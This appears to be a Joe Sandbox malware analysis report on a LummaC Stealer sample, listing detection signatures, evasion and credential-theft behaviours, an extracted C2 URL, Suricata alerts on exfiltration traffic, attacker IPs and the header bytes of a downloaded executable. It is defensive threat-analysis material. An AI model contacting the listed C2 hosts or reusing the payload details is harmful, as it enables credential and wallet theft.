Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561534
MD5:f119a5326d7ef739b4b499912b709bc8
SHA1:9baa232461198249f1ff54f401af2eed8973aec0
SHA256:61bad5edc639bce6554b8f1d5a1ac6b00e93797f27f18f897c98ee21b72c790c
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F119A5326D7EF739B4B499912B709BC8)
    • chrome.exe (PID: 5252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=2012,i,2391827392709409351,7372759067112353565,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,16209135328301955217,6092186935791453691,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2186454577.0000000000D5C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2086754787.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2153552340.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 6 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:01.765593+010020283713Unknown Traffic192.168.2.549704172.67.162.84443TCP
              2024-11-23T17:44:04.079182+010020283713Unknown Traffic192.168.2.549705172.67.162.84443TCP
              2024-11-23T17:44:08.056636+010020283713Unknown Traffic192.168.2.549706172.67.162.84443TCP
              2024-11-23T17:44:10.912847+010020283713Unknown Traffic192.168.2.549707172.67.162.84443TCP
              2024-11-23T17:44:14.053262+010020283713Unknown Traffic192.168.2.549708172.67.162.84443TCP
              2024-11-23T17:44:16.972970+010020283713Unknown Traffic192.168.2.549709172.67.162.84443TCP
              2024-11-23T17:44:19.742968+010020283713Unknown Traffic192.168.2.549712172.67.162.84443TCP
              2024-11-23T17:44:27.647976+010020283713Unknown Traffic192.168.2.549728172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:02.737901+010020546531A Network Trojan was detected192.168.2.549704172.67.162.84443TCP
              2024-11-23T17:44:05.217531+010020546531A Network Trojan was detected192.168.2.549705172.67.162.84443TCP
              2024-11-23T17:44:28.402356+010020546531A Network Trojan was detected192.168.2.549728172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:02.737901+010020498361A Network Trojan was detected192.168.2.549704172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:05.217531+010020498121A Network Trojan was detected192.168.2.549705172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:30.030651+010020197142Potentially Bad Traffic192.168.2.549732185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:17.827198+010020480941Malware Command and Control Activity Detected192.168.2.549709172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T17:44:19.801387+010028438641A Network Trojan was detected192.168.2.549712172.67.162.84443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.828.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
              Source: file.exeReversingLabs: Detection: 34%
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49790 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.5:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49854 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2389402811.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496046413.0000000005E92000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49728 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49712 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Malware configuration extractorURLs: https://property-imper.sbs/api
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 16:44:29 GMTContent-Type: application/octet-streamContent-Length: 2784256Last-Modified: Sat, 23 Nov 2024 16:30:17 GMTConnection: keep-aliveETag: "67420319-2a7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 70 71 70 6a 00 20 2a 00 00 a0 00 00 00 1c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 68 66 6c 77 72 77 00 20 00 00 00 c0 2a 00 00 04 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 5a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49732 -> 185.215.113.16:80
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49790 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGAb88btcw5v4GD&MD=uxdHDVbu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
